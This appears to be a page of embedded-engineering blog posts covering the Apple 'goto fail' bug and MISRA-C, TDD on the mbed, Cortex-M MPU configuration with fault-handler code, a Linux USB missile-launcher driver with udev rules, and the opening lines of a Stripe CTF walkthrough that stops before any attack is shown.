
goto fail and embedded C Compilers

February 27th, 2014

I can’t imagine anyone reading this posting hasn’t already read about the Apple “goto fail” bug in SSL. My reaction was one of incredulity; I really couldn’t believe this code could have got into the wild on so many levels.

First we’ve got to consider the testing (or lack thereof) for this codebase. The side effect of the bug was that all SSL certificates passed, even malformed ones. This implies there was positive testing (i.e. demonstrating that valid certificates are accepted), but no negative testing (i.e. checking that a malformed SSL certificate is rejected), or perhaps no dynamic SSL certificate testing at all.

What I haven’t established* is whether the bug came about through code removal (e.g. there was another ‘if’ statement before the second goto) or whether, through trial-and-error programming, the extra goto got added (with other code) that then didn’t get removed in a clean-up. There are, of course, some schools of thought that believe it was deliberately put in as part of PRISM!

Then you have to query regression testing; have they never tested for malformed SSL certificates (I can’t believe that; mind you I didn’t believe Lance was doping!) or did they use a regression-subset for this release which happened to miss this bug? Regression testing vs. product release is always a massive pressure. Automation of regression testing through continuous integration is key, but even so, for very large code bases it is simplistic to say “rerun all tests”; we live in a world of compromises.

Next, if we actually analyse the code, I can imagine the MISRA-C group jumping around saying “look, look, if only they’d followed MISRA-C this couldn’t have happened” (yes Chris, it’s you I’m envisaging) and of course they’re correct. This code breaks a number of MISRA-C:2012 rules, but most notably:

15.6 (Required) The body of an iteration-statement or selection-statement shall be a compound-statement

This boils down to requiring that every if-statement body is a compound block, so the code would go from (ignoring the glaring coding error of the two gotos):
Read more »

Test Driven Development (TDD) with the mbed

May 24th, 2013

One of the most useful by-products of the acceptance of Agile techniques is the use of Test-Driven Development (TDD) and the growth of associated test frameworks, such as GoogleTest and CppUTest.

I won’t get into the details of TDD here as they are well covered elsewhere (I recommend James Grenning’s book “Test Driven Development for Embedded C” for a good coverage of the subject area), but the principle is

  1. Write a test
  2. Develop enough code to compile and build (but will fail the test)
  3. Write the application code to pass the test
  4. Repeat until done

Obviously that is massively simplifying the process, but that’s the gist. The key to it all is automation, in that you want to write a new test and then the build-deploy-test-report (BDTR) cycle is automated.

To build a TDD environment with the mbed I needed to solve the following obstacles:

  1. Build – using a TDD framework and building the project
  2. Deploy – downloading to the mbed
  3. Test – auto-executing the test code on the mbed
  4. Report – getting test reports back from the mbed to the host

Read more »

Setting up the Cortex-M3/4 (ARMv7-M) Memory Protection Unit (MPU)

February 25th, 2013

An optional part of the ARMv7-M architecture is support for a Memory Protection Unit (MPU). This is a fairly simple device (compared to a fully blown Memory Management Unit (MMU) as found on the Cortex-A family), but if available it can be programmed to help capture illegal or dangerous memory accesses.
When first looking at programming the MPU it may seem rather daunting, but in reality it is very straightforward. An added benefit of the ARMv7-M family is its well-defined memory map.
All example code is based around an NXP LPC1768 and the Keil uVision v4.70 development environment. However, as all examples are built using CMSIS, they should work on any Cortex-M3/M4 supporting the MPU.
First, let’s take four types of memory access we may want to capture or inhibit:

  1. Trying to read at an address that is reserved in the memory map (i.e. no physical memory of any type there)
  2. Trying to write to Flash/ROM
  3. Stopping areas of memory being accessible
  4. Disabling execution of code located in SRAM (eliminating a potential exploit vector)

Before we start we need to understand the microcontroller’s memory map, so here we can look at the memory map of the NXP LPC1768 as defined in chapter 2 of the LPC17xx User Manual (UM10360).

  • 512kB FLASH @ 0x0000 0000 – 0x0007 FFFF
  • 32kB on-chip SRAM @ 0x1000 0000 – 0x1000 7FFF
  • 8kB boot ROM @ 0x1FFF 0000 – 0x1FFF 1FFF
  • 32kB on-chip SRAM @ 0x2007 C000 [AHB SRAM]
  • GPIO @ 0x2009C000 – 0x2009 FFFF
  • APB Peripherals  @ 0x4000 0000 – 0x400F FFFF
  • AHB Peripheral @ 0x5000 0000 – 0x501F FFFF
  • Private Peripheral Bus @ 0xE000 0000 – 0xE00F FFFF

Based on the above map we can set up four tests:

  1. Read from location 0x0008 0000 – this is beyond Flash in a reserved area of memory
  2. Write to location 0x0000 4000 – some random location in the flash region
  3. Read the boot ROM at 0x1FFF 0000
  4. Construct a function in SRAM and execute it

The first three tests are pretty easy to set up using pointer indirection, e.g.:

int* test1 = (int*)0x00080000;    // reserved location (beyond flash)
x = *test1;                       // try to read from reserved location
int* test2 = (int*)0x00004000;    // flash location
*test2 = x;                       // try to write to flash
int* test3 = (int*)0x1FFF0000;    // boot ROM location
x = *test3;                       // try to read from boot ROM

The fourth takes a little more effort, e.g.

// int func(int r0)
// {
//    return r0+1;
// }
typedef int (*funcPtr)(int);                    // needed for the cast below
uint16_t func[] = { 0x4601, 0x1c48, 0x4770 };   // mov r1,r0 ; adds r0,r1,#1 ; bx lr
int main(void)
{
   funcPtr test4= (funcPtr)(((uint32_t)func)+1);  // setup RAM function (+1 for thumb)
   x = test4(x);                                  // call ram function
   while(1);
}

Default Behavior

Without the MPU set up, the following will happen (output from the previous Fault Handler project):

  • test1 will generate a precise bus error

f1

  • test2 will generate an imprecise bus error

f2

Tests 3 and 4 will run without any fault being generated.

Setting up the MPU

There are a lot of options when setting up the MPU, but 90% of the time a core set is sufficient. The ARMv7-M MPU supports up to eight regions (each an address range) that can be individually configured. For each region the core choices are:

  • the start address (e.g. 0x10000000)
  • the size (e.g. 32kB)
  • access permissions (e.g. Read/Write access)
  • memory type (here we’ll limit it to Normal for Flash/SRAM, Device for NXP peripherals, and Strongly Ordered for the private peripherals)
  • executable or not (referred to as Execute Never [XN] in MPU speak)

Both access permissions and memory types have many more options than those covered here, but for the majority of cases these will suffice. Here I’m not intending to cover privileged/non-privileged options (don’t worry if that doesn’t make sense, I shall cover it in a later posting).
Based on our previous LPC1768 memory map we could define a region map thus:

No.  Memory             Address       Type      Access Permissions  Size
0    Flash              0x00000000    Normal    Full access, RO    512KB
1    SRAM               0x10000000    Normal    Full access, RW     32KB
2    SRAM               0x2007C000    Normal    Full access, RW     32KB
3    GPIO               0x2009C000    Device    Full access, RW     16KB
4    APB Peripherals    0x40000000    Device    Full access, RW    512KB
5    AHB Peripherals    0x50000000    Device    Full access, RW      2MB
6    PPB                0xE0000000    SO        Full access, RW      1MB

Note that the boot ROM has not been explicitly mapped. This means any access to that region once the MPU has been initialized will be caught as a memory access violation.
To program a region, we need to write to two registers in order:

  • MPU Region Base Address Register (CMSIS: MPU->RBAR)
  • MPU Region Attribute and Size Register (CMSIS: MPU->RASR)

MPU Region Base Address Register

Bits 0..3 specify the region number
Bit 4 needs to be set to make the region valid
Bits 5..31 hold the base address of the region (the bottom five address bits are ignored – the base address must be on a natural boundary, i.e. for a 32kB region the base address must be a multiple of 32kB)

So if we want to program region 1 we would write:

#define VALID 0x10
MPU->RBAR = 0x10000000 | VALID | 1;  // base addr | valid | region no

MPU Region Attribute and Size Register

This is slightly more complex, but the key bits are:

bit 0 – Enable the region
bits 1..5 – region size; where size is used as 2**(size+1)
bits 16..21 – Memory type (this is actually divided into 4 separate groups)
bits 24..26 – Access Privilege
bit 28 – XN

So given the following defines:

#define REGION_Enabled  (0x01)
#define REGION_32K      (14 << 1)      // 2**15 == 32k
#define NORMAL          (8 << 16)      // TEX:0b001 S:0b0 C:0b0 B:0b0
#define FULL_ACCESS     (0x03 << 24)   // Privileged Read Write, Unprivileged Read Write
#define NOT_EXEC        (0x01 << 28)   // All Instruction fetches abort

We can configure region 1 (the 32kB CPU SRAM) thus:

MPU->RASR = (REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS);

We can now repeat this for each region, thus:

/* Remaining defines, following the RASR bit layout described above */
#define REGION_Valid    (0x10)
#define REGION_16K      (13 << 1)      // 2**14 == 16k
#define REGION_512K     (18 << 1)      // 2**19 == 512k
#define REGION_1M       (19 << 1)      // 2**20 == 1M
#define REGION_2M       (20 << 1)      // 2**21 == 2M
#define RO              (0x06 << 24)   // Privileged Read Only, Unprivileged Read Only
#define DEVICE_NON_SHAREABLE       (16 << 16)  // TEX:0b010 S:0 C:0 B:0
#define STRONGLY_ORDERED_SHAREABLE (0 << 16)   // TEX:0b000 C:0 B:0 (always shareable)

void lpc1768_mpu_config(void)
{
   /* Disable MPU */
   MPU->CTRL = 0;
   /* Configure region 0 to cover 512KB Flash (Normal, Non-Shared, Executable, Read-only) */
   MPU->RBAR = 0x00000000 | REGION_Valid | 0;
   MPU->RASR = REGION_Enabled | NORMAL | REGION_512K | RO;
   /* Configure region 1 to cover CPU 32KB SRAM (Normal, Non-Shared, Not Executable, Full Access) */
   MPU->RBAR = 0x10000000 | REGION_Valid | 1;
   MPU->RASR = REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS;
   /* Configure region 2 to cover AHB 32KB SRAM (Normal, Non-Shared, Not Executable, Full Access) */
   MPU->RBAR = 0x2007C000 | REGION_Valid | 2;
   MPU->RASR = REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS;
   /* Configure region 3 to cover 16KB GPIO (Device, Non-Shared, Full Access) */
   MPU->RBAR = 0x2009C000 | REGION_Valid | 3;
   MPU->RASR = REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_16K | FULL_ACCESS;
   /* Configure region 4 to cover 512KB APB Peripherals (Device, Non-Shared, Full Access) */
   MPU->RBAR = 0x40000000 | REGION_Valid | 4;
   MPU->RASR = REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_512K | FULL_ACCESS;
   /* Configure region 5 to cover 2MB AHB Peripherals (Device, Non-Shared, Full Access) */
   MPU->RBAR = 0x50000000 | REGION_Valid | 5;
   MPU->RASR = REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_2M | FULL_ACCESS;
   /* Configure region 6 to cover the 1MB PPB (Strongly Ordered, Full Access) */
   MPU->RBAR = 0xE0000000 | REGION_Valid | 6;
   MPU->RASR = REGION_Enabled | STRONGLY_ORDERED_SHAREABLE | REGION_1M | FULL_ACCESS;
   /* Enable MPU */
   MPU->CTRL = 1;
   __DSB();
   __ISB();
}

After the MPU has been enabled, DSB and ISB barrier calls ensure that the write enabling the MPU has completed and the pipeline is flushed, so no further instructions execute under the old memory map.

Using the Keil environment, we can examine the MPU configuration:

f3

Rerunning the tests with MPU enabled

To get useful output we can develop a memory fault handler, building on the Hard Fault handler, e.g.

void printMemoryManagementErrorMsg(uint32_t CFSRValue)
{
   printErrorMsg("Memory Management fault: ");
   CFSRValue &= 0x000000FF; // mask just mem faults
   if((CFSRValue & (1<<5)) != 0) {
      printErrorMsg("A MemManage fault occurred during FP lazy state preservation\n");
   }
   if((CFSRValue & (1<<4)) != 0) {
      printErrorMsg("A derived MemManage fault occurred on exception entry\n");
   }
   if((CFSRValue & (1<<3)) != 0) {
      printErrorMsg("A derived MemManage fault occurred on exception return.\n");
   }
   if((CFSRValue & (1<<1)) != 0) {
      printErrorMsg("Data access violation.\n");
   }
   if((CFSRValue & (1<<0)) != 0) {
      printErrorMsg("MPU or Execute Never (XN) default memory map access violation\n");
   }
   if((CFSRValue & (1<<7)) != 0) { // MMARVALID: SCB->MMFAR holds a valid fault address
      static char msg[80];
      sprintf(msg, "SCB->MMFAR = 0x%08x\n", (unsigned int)SCB->MMFAR);
      printErrorMsg(msg);
   }
}

Test 1 – Reading undefined region

Rerunning test one with the MPU enabled gives the following output:

f4

The SCB->MMFAR register contains the address of the memory access that caused the violation, and the PC guides us towards the offending instruction.

f5

Test 2 – Writing to RO defined region

f6

f7

Test 3 – Reading Undefined Region (where memory exists)

f8

f9

Test 4 – Executing code in XN marked Region

f10

The PC gives us the location of the code (in SRAM) that we tried to execute.

f11

The LR indicates the code where the branch was executed

f12

So, we can see with a small amount of programming we can (a) simplify debugging by quickly being able to establish the offending opcode/memory access, and (b) better defend our code against accidental/malicious access.

Optimizing the MPU programming

One useful feature of the Cortex-M3/4 MPU is that the Region Base Address Register and the Region Attribute and Size Register are aliased three further times. This means up to four regions can be programmed at once using a memcpy. So instead of the repeated writes to RBAR and RASR, we can create configuration tables and initialize the MPU using a simple memcpy, thus:

uint32_t table1[] = {
/* Configure region 0 to cover 512KB Flash (Normal, Non-Shared, Executable, Read-only) */
(0x00000000 | REGION_Valid | 0),
(REGION_Enabled | NORMAL_OUTER_INNER_NON_CACHEABLE_NON_SHAREABLE | REGION_512K | RO),
/* Configure region 1 to cover CPU 32KB SRAM (Normal, Non-Shared, Not Executable, Full Access) */
(0x10000000 | REGION_Valid | 1),
(REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS),
/* Configure region 2 to cover AHB 32KB SRAM (Normal, Non-Shared, Not Executable, Full Access) */
(0x2007C000 | REGION_Valid | 2),
(REGION_Enabled | NOT_EXEC | NORMAL_OUTER_INNER_NON_CACHEABLE_NON_SHAREABLE | REGION_32K | FULL_ACCESS),
/* Configure region 3 to cover 16KB GPIO (Device, Non-Shared, Full Access Device, Full Access) */
(0x2009C000 | REGION_Valid | 3),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_16K | FULL_ACCESS)
};

uint32_t table2[] = {
/* Configure region 4 to cover 512KB APB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
(0x40000000 | REGION_Valid | 4),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_512K | FULL_ACCESS),
/* Configure region 5 to cover 2MB AHB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
(0x50000000 | REGION_Valid | 5),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_2M | FULL_ACCESS),
/* Configure region 6 to cover the 1MB PPB (Privileged, XN, Read-Write) */
(0xE0000000 | REGION_Valid | 6),
(REGION_Enabled | NOT_EXEC | DEVICE_NON_SHAREABLE | REGION_1M | P_RW_U_NA),
};

void lpc1768_mpu_config_tbl(void)
{
   /* Disable MPU */
   MPU->CTRL = 0;
   memcpy((void*)&( MPU->RBAR), table1, sizeof(table1));
   memcpy((void*)&( MPU->RBAR), table2, sizeof(table2));
   /* Enable MPU */
   MPU->CTRL = 1;
   __DSB();
   __ISB();
}

I hope this is enough to get you started with your ARMv7-M MPU.

I Dream of a Cheeky Missile Launcher

October 12th, 2012

I read a blog post by Matthias Vallentin a while back about getting a USB missile launcher working and thought that a similar gadget would be a nice candidate for the 2012 refresh of our successful EL503 Developing for Embedded Linux course, so I ordered a nice-looking piece of hardware from Amazon: the Thunder Missile Launcher from Dream Cheeky.

Sadly these guys don’t provide Linux drivers and the hardware wasn’t an exact match for the launcher used in Matthias’ article so I had to do a bit of research.

Normally it would be a case of firing up my Windows partition and using a USB sniffer, but I didn’t want to shut down my system as I was in the middle of quite a few projects. Instead I hit the net and stumbled across the Retaliation project, which used the Thunder launcher to punish people who broke a CI build, and a blog piece by Nathan Milford which had the requisite USB command codes, but in programs that leveraged libusb from userspace.

So now I knew what I had to feed my launcher, and armed with some good resources on Linux USB[1] [2] [3] I could start!

Echoing Matthias’ steps, I created a simple core driver that would print info out in the probe:

/* Rocket launcher specifics */
#define LAUNCHER_VENDOR_ID 0x2123
#define LAUNCHER_PRODUCT_ID 0x1010
#define LAUNCHER_NODE "launcher"

static struct usb_class_driver class;

/* Table of devices that work with this driver */
static struct usb_device_id launcher_table[] =
{
{ USB_DEVICE(LAUNCHER_VENDOR_ID, LAUNCHER_PRODUCT_ID) },
{} /* Terminating entry */
};
MODULE_DEVICE_TABLE (usb, launcher_table);

static struct usb_driver launcher_driver =
{
.name = "launcher_driver",
.id_table = launcher_table,
};

static int launcher_open(struct inode *inodep, struct file *filp)
{
int retval = 0;
pr_debug("launcher_open\n");
/* Save our object in the file's private structure. */
/* filp->private_data = dev; */
return retval;
}

static int launcher_close(struct inode *inodep, struct file *filp)
{
int retval = 0;
pr_debug("launcher_close\n");
/* We can get private data from filp->private_data; */
return retval;
}

static ssize_t launcher_read(struct file *f, char __user *buf, size_t cnt,
loff_t *off)
{
int retval = -EFAULT;
pr_debug("launcher_read\n");
return retval;
}

static ssize_t launcher_write(struct file *filp, const char __user *user_buf,
size_t count, loff_t *off)
{
int retval = -EFAULT;
pr_debug("launcher_write\n");
/* We can get private data from filp->private_data; */
return retval;
}

static struct file_operations fops =
{
.open = launcher_open,
.release = launcher_close,
.read = launcher_read,
.write = launcher_write,
};

static int launcher_probe(struct usb_interface *interface, const struct usb_device_id *id)
{
struct usb_device *udev = interface_to_usbdev(interface);
struct usb_host_interface *iface_desc;
int retval = -ENODEV;

pr_debug("launcher_probe\n");

/* Set up our class */
class.name = LAUNCHER_NODE"%d";
class.fops = &fops;

if ((retval = usb_register_dev(interface, &class)) < 0) {
pr_err("Not able to get a minor for this device\n");
} else {
pr_info("Minor obtained: %d\n", interface->minor);
}
/* This will be our private interface device data instead of NULL eventually */
/* usb_set_intfdata(interface, NULL); */
return retval;
}

static void launcher_disconnect(struct usb_interface *interface)
{
pr_debug("launcher_disconnect\n");
/* Give back our minor. */
usb_deregister_dev(interface, &class);
}

static int __init launcher_init(void)
{
int result;
pr_debug("launcher_init\n");

/* Wire up our probe/disconnect */
launcher_driver.probe = launcher_probe;
launcher_driver.disconnect = launcher_disconnect;

/* Register this driver with the USB subsystem */
if ((result = usb_register(&launcher_driver))) {
pr_err("usb_register() failed. Error number %d", result);
}
return result;
}

static void __exit launcher_exit(void)
{
/* Deregister this driver with the USB subsystem */
usb_deregister(&launcher_driver);
}

module_init(launcher_init);
module_exit(launcher_exit);

I compiled this with the makefile, inserted the module and saw that my init call had successfully been called, so I popped the launcher’s USB connector into my laptop and…. nothing.

I checked dmesg and saw it had been claimed by hid-generic, part of the usbhid module on my laptop!


[205211.636201] usb 2-1.2: >USB disconnect, device number 23
[205214.371289] usb 2-1.2: >new low-speed USB device number 24 using ehci_hcd
[205214.462969] usb 2-1.2: >New USB device found, idVendor=2123, idProduct=1010
[205214.462979] usb 2-1.2: >New USB device strings: Mfr=1, Product=2, SerialNumber=0
[205214.462985] usb 2-1.2: >Product: USB Missile Launcher
[205214.462990] usb 2-1.2: >Manufacturer: Syntek
[205214.468668] hid-generic 0003:2123:1010.000B: >hiddev0,hidraw0: USB HID v1.10 Device [Syntek USB Missile Launcher] on usb-0000:00:1d.0-1.2/input0

To get usbhid to release it, you can tell it to unbind using sysfs.


[nick@slimtop ~]$ ls /sys/bus/usb/drivers/usbhid/
2-1.2:1.0 bind module new_id remove_id uevent unbind
^^^ Our address
[nick@slimtop ~] sudo sh -c 'echo 2-1.2:1.0 > /sys/bus/usb/drivers/usbhid/unbind'
[nick@slimtop ~]$ ls
bind module new_id remove_id uevent unbind

To get it to bind to our driver, we have to poke it manually:

[nick@slimtop ~]$ sudo sh -c 'echo "2-1.2:1.0" > /sys/bus/usb/drivers/launcher_driver/bind'

Checking dmesg again showed that the probe function had been called and we had our /dev/launcher0!

I now needed to update the information expected by the driver. The original launcher used in Matthias’ article had different codes for most of the commands, so using the userspace information we could update the command codes and tweak the control codes.

#define LAUNCHER_NODE "launcher"
#define LAUNCHER_CTRL_BUFFER_SIZE 8
#define LAUNCHER_CTRL_REQUEST_TYPE 0x21
#define LAUNCHER_CTRL_REQUEST 0x09
#define LAUNCHER_CTRL_VALUE 0x0
#define LAUNCHER_CTRL_INDEX 0x0
#define LAUNCHER_CTRL_COMMAND_PREFIX 0x02

#define LAUNCHER_STOP 0x20
#define LAUNCHER_UP 0x02
#define LAUNCHER_DOWN 0x01
#define LAUNCHER_LEFT 0x04
#define LAUNCHER_RIGHT 0x08
#define LAUNCHER_UP_LEFT (LAUNCHER_UP | LAUNCHER_LEFT)
#define LAUNCHER_DOWN_LEFT (LAUNCHER_DOWN | LAUNCHER_LEFT)
#define LAUNCHER_UP_RIGHT (LAUNCHER_UP | LAUNCHER_RIGHT)
#define LAUNCHER_DOWN_RIGHT (LAUNCHER_DOWN | LAUNCHER_RIGHT)
#define LAUNCHER_FIRE 0x10

Our USB command takes the form of:
REQUEST_TYPE | REQUEST | VALUE | INDEX | DATA
where DATA is an 8-byte buffer with the first byte set to 0x02, our COMMAND_PREFIX.

For example, to send a fire command (0x10) we would use a usb_control_msg like this

int usb_control_msg ( struct usb_device *dev,
unsigned int pipe,
0x09, // Request
0x21, // Request Type
0x0, // Value
0x0, // Index
&buffer, // Buffer
sizeof(buffer), // Length of buffer
int timeout);

where buffer would be a blank char buffer of 8 bytes with the first and second bytes set to the COMMAND_PREFIX and command code respectively, as you can see in this snippet from our launcher_write() function:

...
if (copy_from_user(&cmd, user_buf, count)) {
retval = -EFAULT;
goto unlock_exit;
}

/* Prepare the buffer, noting the prefix */
memset(&buf, 0, sizeof(buf));
buf[0] = LAUNCHER_CTRL_COMMAND_PREFIX;
buf[1] = cmd;

/* The interrupt-in-endpoint handler also modifies dev->command. */
spin_lock(&dev->cmd_spinlock);
dev->command = cmd;
spin_unlock(&dev->cmd_spinlock);

pr_debug("Sending usb_control_message()\n");
retval = usb_control_msg(dev->udev,
usb_sndctrlpipe(dev->udev, 0),
LAUNCHER_CTRL_REQUEST,
LAUNCHER_CTRL_REQUEST_TYPE,
LAUNCHER_CTRL_VALUE,
LAUNCHER_CTRL_INDEX,
&buf,
sizeof(buf),
HZ*5);
...

I won’t cover too much of the USB code as it is covered in far more depth in Matthias’ article and in Greg KH’s usb-skeleton.c in the kernel source tree.

To control our driver, we can send bytes from userspace to the /dev/launcher0 entry. I was able to repurpose Matthias’ launcher program to send the correct command codes to the device, and I have added it to the Git repository. When you build the executable and module using make (assuming you have the right libraries), you will get a launcher_driver.ko and a launcher_control executable.

Insert the kernel module using insmod ./launcher_driver.ko and you can then start issuing commands to the launcher.

Unfortunately, by default the device node /dev/launcher0 is created as root:root with permissions 0600, which means that you can either chmod/chgrp it or run the launcher as root(!), which is the simplest test:

sudo ./launcher_control -f

usbhid and the Handsy Driver

As we’ve seen, usbhid tries to claim our device by default because it looks like a Human Interface Device. I had to do a fair amount of digging to find out how to stop usbhid from claiming it, which I’ll recap here for those who seek enlightenment.

If we look at the source code in drivers/hid/usbhid/hid-quirks.c we can see a structure that defines a blacklist of HID devices.

static const struct hid_blacklist {
__u16 idVendor;
__u16 idProduct;
__u32 quirks;
} hid_blacklist[] = {
{ USB_VENDOR_ID_AASHIMA, USB_DEVICE_ID_AASHIMA_GAMEPAD, HID_QUIRK_BADPAD },
{ USB_VENDOR_ID_AASHIMA, USB_DEVICE_ID_AASHIMA_PREDATOR, HID_QUIRK_BADPAD },
{ USB_VENDOR_ID_ALPS, USB_DEVICE_ID_IBM_GAMEPAD, HID_QUIRK_BADPAD },
...
{ USB_VENDOR_ID_WISEGROUP_LTD2, USB_DEVICE_ID_SMARTJOY_DUAL_PLUS, HID_QUIRK_NOGET | HID_QUIRK_MULTI_INPUT },
...

This shows a format of VENDOR_ID, DEVICE_ID and the HID_QUIRK mode, which can be multiple values OR’d together. If we look further down the source, we can see the following function:

int usbhid_quirks_init(char **quirks_param)
{
u16 idVendor, idProduct;
u32 quirks;
int n = 0, m;
for (; n < MAX_USBHID_BOOT_QUIRKS && quirks_param[n]; n++) {
m = sscanf(quirks_param[n], "0x%hx:0x%hx:0x%x",
&idVendor, &idProduct, &quirks);
if (m != 3 ||
usbhid_modify_dquirk(idVendor, idProduct, quirks) != 0) {
printk(KERN_WARNING
"Could not parse HID quirk module param %s\n",
quirks_param[n]);
}
}
return 0;
}

The quirks_param array is passed in from hid-core.c in the following snippet:

/* Quirks specified at module load time */
static char *quirks_param[MAX_USBHID_BOOT_QUIRKS] = { [ 0 ... (MAX_USBHID_BOOT_QUIRKS - 1) ] = NULL };
module_param_array_named(quirks, quirks_param, charp, NULL, 0444);
MODULE_PARM_DESC(quirks, "Add/modify USB HID quirks by specifying "
" quirks=vendorID:productID:quirks"
" where vendorID, productID, and quirks are all in"
" 0x-prefixed hex");

This shows us that the quirk param values are read in the form 0xVENDORID:0xPRODUCTID:0xQUIRKS. Now that we know how to get usbhid to apply a quirk to our device, we need to know which one.

Our quirks are defined in include/linux/hid.h. We want to tell usbhid to leave the device alone, so we’re going to use HID_QUIRK_IGNORE, which has the value 0x04.

Once we have this information we should be able to modprobe -r usbhid && modprobe usbhid quirks=0x2123:0x1010:0x04 … except that we can’t remove the module on our Fedora system…

[nick@slimtop ~]$ modprobe -r usbhid
FATAL: Module usbhid is builtin.

Oh dear. This means that the usbhid module isn’t loaded at runtime; it has been built into the kernel, so we can’t change it from userspace: the kernel, with usbhid, is already running before the filesystem has been mounted. Instead we need to pass the parameter to the kernel in the form:
module.parameter=OPTIONS.
To do this, I edited my kernel command in /boot/grub2/grub.cfg to tell the builtin module about our device and add it to the quirks list.


...
echo 'Loading Fedora (3.6.2-4.fc17.i686)'
linux /vmlinuz-3.6.2-4.fc17.i686 root=/dev/mapper/vg_slimtop-lv_root ro rd.md=0 rd.dm=0 rd.lvm.lv=vg_slimtop/lv_root SYSFONT=True usbhid.quirks=0x2123:0x1010:0x04 KEYTABLE=uk rd.luks=0 rd.lvm.lv=vg_slimtop/lv_swap LANG=en_US.UTF-8 rhgb quiet
...

Finally, we can get our kernel module to load automatically by copying our launcher_driver.ko into the /lib/modules/`uname -r`/ directory and running depmod -a.

On rebooting, you should be able to insert your launcher and up will pop a /dev/launcher0 without usbhid getting handsy with it.

udev

udev is the device manager for the Linux kernel. Primarily, it manages device nodes in /dev so we’re going to use that to manipulate the creation of our /dev/launcher0 entry.

There is a lot of information spread over the net on udev but it’s sometimes out of date and no longer relevant. It’s best to ask questions in IRC, copy existing rules (see /usr/lib/udev/rules.d/*) or just read the source to get the most up-to-date information.

To avoid having to run our launcher as root we can create a special rule for udev[1] to manipulate how the node is created. To do this you will need to create a new file, /etc/udev/rules.d/10-dreamcheeky.rules, containing the following:


KERNEL=="launcher?*",MODE="0666",GROUP="wheel"

This tells udev that we want any event from the KERNEL that matches “launcher?*”, which is what our driver requests (the glob pattern matches any number after the launcher string, such as 1, 2, 3, etc.).
When that KERNEL key has been matched, we apply the two assignments, which set the permissions mode to 0666 (rw-rw-rw-) and the group to wheel.

To test our rule, we need to know how udev sees our USB device so we do the following:

[nick@slimtop ~]$ find /sys/devices/ -name launcher0
/sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0

To test our udev rule, we run udevadm test against our device path:

[nick@slimtop rules.d]$ sudo udevadm test /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0
run_command: calling: test
adm_test: version 182
This program is for debugging only, it does not run any program,
specified by a RUN key. It may show incorrect results, because
some values may be different, or not available at a simulation run.

builtin_kmod_init: load module index
...
parse_file: reading '/etc/udev/rules.d/10-dreamcheeky.rules' as rules file <--- OUR RULES FILE
...
parse_file: reading '/usr/lib/udev/rules.d/99-systemd.rules' as rules file
udev_rules_new: rules use 249228 bytes tokens (20769 * 12 bytes), 42425 bytes buffer
udev_rules_new: temporary index used 76720 bytes (3836 * 20 bytes)
udev_device_new_from_syspath: device 0xb9009810 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
udev_device_new_from_syspath: device 0xb9009b00 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
udev_device_read_db: device 0xb9009b00 filled with db file data
udev_rules_apply_to_event: GROUP 10 /etc/udev/rules.d/10-dreamcheeky.rules:1
udev_rules_apply_to_event: MODE 0666 /etc/udev/rules.d/10-dreamcheeky.rules:1
udev_device_new_from_syspath: device 0xb901a540 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0'
udev_device_new_from_syspath: device 0xb901a088 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2'
udev_device_new_from_syspath: device 0xb90239b0 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1'
udev_device_new_from_syspath: device 0xb9023cb0 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2'
udev_device_new_from_syspath: device 0xb9024000 has devpath '/devices/pci0000:00/0000:00:1d.0'
udev_device_new_from_syspath: device 0xb901f220 has devpath '/devices/pci0000:00'
udev_device_read_db: no db file to read /run/udev/data/+usb:2-1.2:1.0: No such file or directory
udev_node_add: handling device node '/dev/launcher0', devnum=c180:0, mode=0666, uid=0, gid=10
node_fixup: preserve permissions /dev/launcher0, 020666, uid=0, gid=10
node_symlink: preserve already existing symlink '/dev/char/180:0' to '../launcher0'
udev_device_update_db: created empty file '/run/udev/data/c180:0' for '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
ACTION=add
DEVNAME=/dev/launcher0
DEVPATH=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0
MAJOR=180
MINOR=0
SUBSYSTEM=usbmisc
UDEV_LOG=6
USEC_INITIALIZED=684838211
builtin_kmod_exit: unload module index

That’s it – you should be able to remove/insert your USB device and have /dev/launcher0 show up with the permissions and group you chose.

Conclusion

This has been a very long blog article, but I hope it is helpful and serves to tie together a lot of good resources that seem spread thinly across the net. Have fun and experiment!

The code for the userspace and driver is available on our Feabhas Github at https://github.com/feabhas/dreamlauncher with a single Makefile to build both projects.

I built this on Fedora 17 so your mileage may vary depending on your distribution/environment.

[1] Special thanks go to the #udev IRC channel on freenode (in particular the user falconindy) and these two resource pages:

Capturing the Stripe-d Flag 2.0 – The After Party

August 30th, 2012

Following on from our previous article looking at Stripe’s Capture the Flag 2.0 challenge, Team Feabhas cracked the last of the levels and its members should hopefully be receiving their complimentary t-shirts soon.

It has proven to be a popular article with lots of people coming to the blog for solutions and walk-through, and now that the competition has finished we have decided to share the way we approached each of these levels, their solution and the way in which the attack vector can be mitigated.

Level 0

The Brief

We are told that the key to level 1 is stored in the database and that we have to ‘crack’ it. Looking at the code we can see that it holds data in key/value pairs, but we don’t know the key, so we can’t get the value.

app.post('/*', function(req, res) {
        var namespace = req.body['namespace'];
